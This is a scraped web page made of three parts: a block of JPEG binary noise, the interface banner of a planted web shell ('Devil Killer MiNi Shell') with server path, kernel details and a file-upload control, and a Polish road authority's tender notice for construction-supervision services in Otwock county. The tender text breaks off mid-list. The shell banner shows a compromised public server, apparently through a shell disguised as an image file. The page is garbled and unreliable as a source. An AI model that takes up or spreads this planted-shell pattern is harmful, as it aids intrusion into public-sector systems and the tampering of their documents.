JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20221230/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20221230/0052664101-N-2022.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> Sprawowanie nadzoru inwestorskiego nad zadaniami inwestycyjnymi </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">ZARZĄD DRÓG POWIATOWYCH W OTWOCKU</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 014848593</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">ul. Bohaterów Westerplatte 36</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Karczew</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">05-480</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">mazowieckie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL912 - Warszawski wschodni</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">zdp@powiat-otwocki.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">https://www.bip.powiat-otwocki.pl/</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Budownictwo i obiekty komunalne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Sprawowanie nadzoru inwestorskiego nad zadaniami inwestycyjnymi </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-c4500887-881a-11ed-94da-6ae0fe5e7159</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2022/BZP 00526641</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2022-12-30</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 2 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://zdpotwock.eb2b.com.pl/edit-auction.html/379310 <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">Komunikacja między zamawiającym a wykonawcami odbywa się wyłącznie przy<br/>użyciu środków komunikacji elektronicznej zgodnie z art. 61 ustawy, za pośrednictwem elektronicznej platformy zakupowej (dalej:<br/>„Platforma”) pod adresem: https://zdpotwock.eb2b.com.pl/ , która spełnia wymagania opisane w art. 64 ustawy. Wykonawca<br/>zamierzający wziąć udział w postępowaniu o udzielenie zamówienia publicznego, musi posiadać konto na Platformie Zakupowej.<br/>Zarejestrowanie i utrzymywanie konta na Platformie Zakupowej oraz korzystanie z Platformy jest bezpłatne.</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Wymagania techniczne i organizacyjne<br/>korzystania z Platformy Zakupowej określa Regulamin Platformy Zakupowej (dostępny pod adresem internetowym<br/>https://platforma.eb2b.com.pl/user/terms lub https://xx.eb2b.com.pl/user/terms). Wykonawca przystępując do postępowania o<br/>udzielenie zamówienia publicznego tj. bezpłatnie rejestrując się lub logując (w przypadku posiadania konta w Platformie Zakupowej),<br/>akceptuje warunki korzystania z Platformy, określone w Regulaminie oraz uznaje go za wiążący.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zgodnie z art. 13 ust. 1 i 2 rozporządzenia Parlamentu Europejskiego i Rady (UE)<br/>2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie<br/>swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych) (Dz. Urz. UE<br/>L 119 z 04.05.2016, str. 1), dalej „RODO”, informuję, że:<br/>• administratorem Pani/Pana danych osobowych jest Zarząd Dróg Powiatowych w Otwocku z/s w<br/>Karczewie ul. Bohaterów Westerplatte 36, 05-480 Karczew tel. 22 780 64 21<br/>• inspektorem ochrony danych osobowych w Zarząd Dróg Powiatowych w Otwocku jest Pani Daria<br/>Bartnicka, email: iod@powiat-otwocki.pl ,<br/>• Pani/Pana dane osobowe przetwarzane będą na podstawie art. 6 ust. 1 lit. c RODO w celu<br/>związanym z postępowaniem o udzielenie zamówienia publicznego,<br/>• odbiorcami Pani/Pana danych osobowych będą osoby lub podmioty, którym udostępniona zostanie dokumentacja postępowania w<br/>oparciu o art. 8 oraz art. 96 ust. 3 ustawy z dnia 29 stycznia 2004 r. – Prawo zamówień publicznych (Dz. U. z 2019 r. poz. 1843),<br/>dalej „ustawa Pzp”;<br/>• Pani/Pana dane osobowe będą przechowywane, zgodnie z art. 97 ust. 1 ustawy Pzp, przez okres 4 lat od dnia zakończenia<br/>postępowania o udzielenie zamówienia, a jeżeli czas trwania umowy przekracza 4 lata, okres przechowywania obejmuje cały czas<br/>trwania umowy;<br/>• obowiązek podania przez Panią/Pana danych osobowych bezpośrednio Pani/Pana dotyczących jest wymogiem ustawowym<br/>określonym w przepisach ustawy Pzp, związanym z udziałem w postępowaniu o udzielenie zamówienia publicznego; konsekwencje<br/>niepodania określonych danych wynikają z ustawy Pzp;<br/>• w odniesieniu do Pani/Pana danych osobowych decyzje nie będą podejmowane w sposób zautomatyzowany, stosowanie do art. 22<br/>RODO;<br/>• posiada Pani/Pan: na podstawie art. 15 RODO prawo dostępu do danych osobowych Pani/Pana dotyczących; na podstawie art. 16<br/>RODO prawo do sprostowania Pani/Pana danych osobowych **; na podstawie art. 18 RODO prawo żądania od administratora<br/>ograniczenia przetwarzania danych<br/>osobowych z zastrzeżeniem przypadków, o których mowa w art. 18 ust. 2 RODO; prawo do wniesienia skargi do Prezesa Urzędu<br/>Ochrony Danych Osobowych, gdy uzna Pani/Pan, że przetwarzanie danych osobowych Pani/Pana dotyczących narusza przepisy<br/>RODO;<br/>• nie przysługuje Pani/Panu: w związku z art. 17 ust. 3 lit. b, d lub e RODO prawo do usunięcia danych osobowych; prawo do<br/>przenoszenia danych osobowych, o którym mowa w art. 20 RODO; na podstawie art. 21 RODO prawo sprzeciwu, wobec<br/>przetwarzania danych osobowych, gdyż<br/>podstawą prawną przetwarzania Pani/Pana danych osobowych jest art. 6 ust. 1 lit. c RODO.</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">Skorzystanie przez osobę, której dane osobowe dotyczą, z uprawnienia do sprostowania lub uzupełnienia o których mowa w art 16 rozporządzenia 2016/679 , nie może skutkować zmiana wyniku postępowania o udzielenie<br/>zamówienia ani zmianą postanowień umowy w sprawi Skorzystanie przez osobę, której dane osobowe dotyczą, z uprawnienia do sprostowania lub uzupełnienia o których mowa w art 16 rozporządzenia 2016/679 , nie może skutkować zmiana wyniku postępowania o udzielenie zamówienia ani zmianą postanowień</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">ZDP/P-34/2022</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.9.) Liczba części: <span class="normal">2</span></h3> <h3 class="mb-0">4.1.10.) Ofertę można składać na wszystkie części</h3> <h3 class="mb-0">4.1.11.) Zamawiający ogranicza liczbę części zamówienia, którą można udzielić jednemu wykonawcy: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="p-2 mt-4 bg-light">Część 1</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Część I – poprawą bezpieczeństwa na drodze powiatowej 2739W w m. Gadka<br/>1.	Pełnienie nadzoru obejmuje następujące branże:<br/>a)	Inspektor nadzoru w specjalności drogowej w zakresie wymaganym dokumentacją projektową,<br/>b)	Inspektor nadzoru w specjalności teletechnicznej w zakresie wymaganym dokumentacją projektową,<br/><br/>2.	Roboty budowlane objęte zakresem nadzoru inwestorskiego zostały ujęte w dokumentacji projektowej „Przebudowy drogi powiatowej Nr 2739W w miejscowości Gadka polegającej na budowie chodnika wraz z odwodnieniem” opracowany przez SEDROX Sebastian Drozdowski<br/><br/>3.	Informujemy, iż przedmiotowe roboty budowlane będą prowadzone na podstawie posiadanego przez Inwestora zaświadczenia o niewniesieniu sprzeciwu na zgłoszone roboty. <br/><br/>4.	Informację dotyczące robót budowlanych:<br/>1)	Zakres prac obejmuje odcinek około 1 357 m - od działki ewidencyjnej nr 230/1 obr. Gadka do działki ewidencyjnej nr 226/12 obr. Gadka. Szczegółowy zakres został określony w dokumentacji projektowej.<br/><br/>2)	W ramach zamówienia należy:<br/>a)	Wykonać roboty rozbiórkowe istniejących poboczy, istniejących zjazdów, przepustów i innych niezbędnych elementów drogi,<br/>b)	Wykonanie peronów o długości 20,00 m i szerokości 2,00m, z zastosowaniem płytek z powierzchnią antypoślizgową oraz żółtych płytek z wypustkami,<br/>c)	Ustawienie istniejącej wiaty przystaniowej w nowej lokalizacji peronu,<br/>d)	Wykonanie miejscowych poszerzeń nawierzchni jezdni w celu uzyskania nawierzchni jezdni o szerokości 5,50 m,<br/>e)	Wykonanie zjazdów po obu stronach drogi przy czym<br/>- zjazdy w ciągu chodnika należy wykonać z mieszanki mineralno-asfaltowej (warstwa pospółki gr. 15 cm, podbudowa z kruszywa łamanego 0/31,5 mm stabilizowanego mechanicznie gr. 20 cm, warstwa wiążąca AC16 W gr. 5 cm, warstwa ścieralna AC11S gr. 4)<br/>- pozostałe zjazdy należy wykonać z kostki betonowej 10x20 cm koloru czerwonego o grubości 8 cm, na podsypce cementowo-piaskowej oraz podbudowie,<br/>f)	Wykonanie przebudowy istniejących przepustów zlokalizowanych pod jednią:<br/>- w km 0+069 wykonanego z rur PEHD o średnicy 40 cm – budowa ścianki czołowej oraz połączenie przy pomocy studni projektowanego rowu krytego,<br/>- w km 0+223 wykonanego z rur PEHD o średnicy 40 cm – budowa ścianki czołowej,<br/>- w km 0+443 wykonanego z rur betonowych o średnicy 60 cm – budowa ścianek czołowych,<br/>- w km 0+772 wykonanego z rur betonowych o średnicy 60 cm – pozostaje bez zmian<br/>- w km 0+928 wykonanego z rur betonowych o średnicy 60 cm – budowa ścianek czołowych,<br/>g)	Wykonać chodnik o szerokości 2,00 m bezpośrednio przy krawędzi jezdni po stronie lewej (północnej) z mieszanki mineralno-asfaltowej (warstwa pospółki o gr. 15 cm, podbudowa z kruszywa łamanego 0/31,5 mm stabilizowanego mechanicznie o grubości 20 cm, warstwa wiążąca AC16W o gr. 4 cm, warstwa ścieralna AS11S o gr. 3 cm)<br/>h)	Wykonać prace związane z przebudową sieci teletechnicznej napowietrznej wraz z okablowaniem (m.in. zdemontowanie kolidujących słupów teletechnicznych SZ-7 – 5 szt., wybudowanie słupów teletechnicznych SZ-7 przy granicy działki – 5 szt.)<br/>i) Wykonanie odwodnienia chodnika oraz drogi,<br/>j) Usunięcie drzew i krzewów<br/>k)	Przestawienie ogrodzeń wraz z bramami zlokalizowanych w działce drogowej,<br/>l) Regulacja urządzeń podziemnych,<br/>m)	Wykonanie humusowania i obsiania mieszanką traw <br/>n) Wprowadzenie stałej organizacji ruchu zgodnie z zatwierdzonym projektem KT.7121.2.30.2022.MB<br/>3)	Szczegółowy zakres robót budowlanych został określony w dokumentacji projektowej, która dostępna jest na stronie internetowej https://zdpotwock.eb2b.com.pl w postepowaniu na roboty budowlane – ZDP/P-18/2022<br/>5.	Informację dotyczące inspektora:<br/>1)	Zamawiający wymaga, aby wykonawca zapewnił osobę, która będzie pełniła funkcję wiodącego inspektora nadzoru posiadającego uprawnienia do kierowania robotami budowlanymi bez ograniczeń, w specjalności drogowej,<br/>2)	Wykonawca pełnić swoje obowiązki zgodnie z przepisami polskiego prawa budowlanego, zadania Inspektora Nadzoru będą obejmowały zarówno pełnienie Nadzoru inwestorskiego, jak i rozliczenie i sprawozdawczość budowy (monitoring i kontrola wykonania zadania na roboty pod względem technicznym, finansowym, organizacyjnym i czasowym).<br/>3)	Inspektor Nadzoru Inwestorskiego (Wykonawca) reprezentuje Zamawiającego na budowie poprzez sprawowanie kontroli zgodności realizacji robót z dokumentacją projektową, specyfikacjami technicznymi, przepisami, zasadami wiedzy technicznej oraz umową zawartą z wykonawcą robót budowlanych.<br/>4)	Zamawiający przewiduje płatności częściowe po odebraniu prac częściowych od Wykonawców, potwierdzone protokołem częściowym. Płatność zgodnie z zatwierdzonym przez Zamawiającego harmonogramem płatności tożsamym z harmonogramem płatności Wykonawcy robót budowlanych <br/>5)	Do obowiązków Inspektora Nadzoru należy:<br/>	Zapoznanie się z dokumentacją, terenem budowy, jego uzbrojeniem i zagospodarowaniem,<br/>	Uczestniczenie w protokolarnym przekazaniu terenu budowy,<br/>	Sprawdzenie wytyczenia przez wykonawcę robót: trasy, docelowego ukształtowania terenu objętego robotami oraz pozostałych prac w zakresie pomiarów sytuacyjno – wysokościowych i weryfikacja ich zgodności z dokumentacja projektową,<br/>	Sprawdzanie, wprowadzanie uwag i akceptowanie harmonogramów rzeczowo – finansowych,<br/>	Prowadzenie wszelkich niezbędnych kontroli zgodności cech jakościowych elementów robót i materiałów zgodnie z wymogami specyfikacji technicznych wykonania i odbioru robót,<br/>	Akceptowanie organizacji, receptur i technologii wykonania robót zgodnie z wymogami SST,<br/>	Akceptowanie wszystkich zastosowanych do budowy materiałów pod kątem ich rodzaju, parametrów technicznych, cech i źródeł pochodzenia,<br/>	Kontrola i ocena przedkładanych świadectw jakościowych, aprobat technicznych, deklaracji zgodności oraz atestów na materiały i elementy sprowadzane z zewnątrz w celu wykorzystania w procesie robót budowlanych, kontrola sposobu składowania i przechowywania materiałów,<br/>	Egzekwowania od Wykonawcy robót wymaganych badań i pomiarów<br/>	Kontrolowanie przestrzegania przez Wykonawcę Robót zasad BHP,<br/>	Sprawdzanie zgodności robót z dokumentacją projektową oraz przepisami techniczno-budowlanymi, normami i przepisami BHP,<br/>	Sporządzanie protokołów odbiorów częściowych i końcowych, <br/>	Sporządzanie protokołów z narad i przekazywanie ich Zamawiającemu i Wykonawcy robót w terminie 3 dni od dnia narady<br/>	Zapewnienie dokumentowania przebiegu robót w dzienniku budowy lub w innej uzgodnionej z zamawiającym formie<br/>	Kontrolowanie ilości i terminowości wykonanych robót,<br/>	Składania miesięcznych raportów z postępu prac,<br/>	Opiniowanie wniosków Wykonawcy w sprawie zmian sposobu wykonania robót budowlanych w stosunku do dokumentacji projektowej lub wykonania robót dodatkowych lub zamówień dodatkowych czy uzupełniających, a po ich zatwierdzeniu przez Zamawiającego uzgodnienie tych zmian z projektantem sprawującym nadzór nad realizacją dokumentacji projektowej,<br/>	Opiniowanie wniosków Wykonawcy prac w sprawie zmiany sposobu wykonywania robót budowlanych, w tym zmiany materiałów, urządzeń i technologii<br/>	Przyjęcie zgłoszenia Wykonawcy o zakończeniu robót i po sprawdzeniu dokumentacji powykonawczej powiadomienie Zamawiającego o gotowości robót do odbioru końcowego,<br/>	Sporządzenie dokumentacji fotograficznej<br/>	Wnioskowanie Zamawiającemu zastosowania kar umownych <br/>	Kontrolowanie czy roboty są prowadzone zgodnie z Czasową Organizacją Ruchu <br/>	Kontrolowanie zabezpieczenia przez wykonawcę placu budowy w okresie zimowym,<br/>	Godziny prac inspektorów nadzoru w tym inspektorów robót branżowych muszą być dostosowane do godzin pracy Wykonawcy,<br/>	Zwoływania comiesięcznych lub w razie konieczności częstszym narad dotyczących postępu robót, w których biorą udział przedstawiciele wszystkich zaangażowanych w realizację zadania na roboty stron<br/>	Żądania od Wykonawcy prac, dokonania poprawek bądź ponownego wykonania wadliwie wykonanych robót, a także wstrzymania dalszych robót budowlanych w przypadku, gdy ich kontynuacja mogła wywołać zagrożenie bądź spowodować niezgodność z dokumentacją projektową<br/>	Uczestniczenie w przeglądach gwarancyjnych<br/>	Wystawiania wszelkich niezbędnych dokumentów związanych z realizacją zadania inwestycyjnego, wymaganych przez zamawiającego<br/>	Rozpatrywanie wszelkiego rodzaju skarg i roszczeń osób trzecich wywołanych realizacją zadania inwestycyjnego i rozwiązywanie problemów z tym związanych,<br/>	Realizowanie wszystkich innych czynności i zarządzeń określonych przez zamawiającego, które będą niezbędne do poprawnej realizacji zadania inwestycyjnego i zabezpieczenia interesu Zamawiającego </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">71247000-1 - Nadzór nad robotami budowlanymi</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">71520000-9 - Usługi nadzoru budowlanego</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2023-12-15</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60,00</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Częstotliwość pobytu na budowie inspektora nadzoru w branży drogowej</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40,00</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 2</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Część II – rozbudowa skrzyżowania ul. Napoleońskiej i Łąkowej w Gliniance <br/>1.	Pełnienie nadzoru obejmuje następujące branże:<br/>c)	Inspektor nadzoru w specjalności drogowej w zakresie wymaganym dokumentacją projektową,<br/>d)	Inspektor nadzoru w specjalności elektroenergetycznej w zakresie wymaganym dokumentacją projektową,<br/>e)	Inspektor nadzoru w specjalności teletechnicznej w zakresie wymaganym dokumentacją projektową,<br/><br/>2.	Roboty budowlane objęte zakresem nadzoru inwestorskiego zostały ujęte w dokumentacji projektowej „Rozbudowa skrzyżowania drogi powiatowej Nr 2709W ulicy Napoleońskiej z drogą powiatową Nr 2710W ulicy Łąkowej na pograniczu miejscowości Lipowo i Glinianka w gminie Wiązowna” <br/><br/>3.	Informujemy, iż przedmiotowe roboty budowlane będą prowadzone na podstawie posiadanej przez Inwestora decyzji zezwalającej na realizację inwestycji drogowej <br/><br/>4.	Informację dotyczące robót budowlanych:<br/>1)	W ramach zamówienia należy:<br/>o)	Wycinka drzew kolidujących z inwestycją oraz wprowadzenie nasadzeń w obrębie pasa drogowego ulicy Napoleońskiej i Łąkowej,<br/>p)	Rozebranie istniejącej nawierzchni jezdni, kolidujących z nowym rozwiązaniem projektowy wraz z krawężnikiem,<br/>q)	Wykopanie wykopów pod projektowany układ oświetlenia oraz układ teletechniczny, demontaż słupów i opraw oświetleniowych w sposób bezpieczny,<br/>r)	Wykonanie wykopów pod układ rowów bezodpływowych,<br/>s)	Ułożenie drenażu, warstwy foli nieprzepuszczalnej,<br/>t) Wykonanie przebudowy układu oświetlenia i sieci teletechnicznej,<br/>u)	Wykonanie koryt pod projektowaną nawierzchnię wraz z ewentualnym pogłębieniem koryt uzyskanych po rozbiórce istniejącej nawierzchni,<br/>v)	Ułożenie warstwy odsączającej z pospółki<br/>w)	Ułożenie podbudowy z kruszywa łamanego stabilizowanego mechanicznie,<br/>x) Ułożenie ław betonowych<br/>y)	Ułożenie warstwy wiążącej z mieszanki mineralno-asfaltowej<br/>z) Ułożenie warstwy ścieralnej z mieszanki mineralno-asfaltowej<br/>aa)	Ułożenie warstwy ścieralnej z płyt betonowych na chodniku,<br/>bb)	Ułożenie warstwy ścieralnej z mieszanki mineralno-asfaltowej w obrębie projektowanych dróg rowerowych i ciągów pieszo-rowerowych,<br/>cc)	Ułożenie warstwy 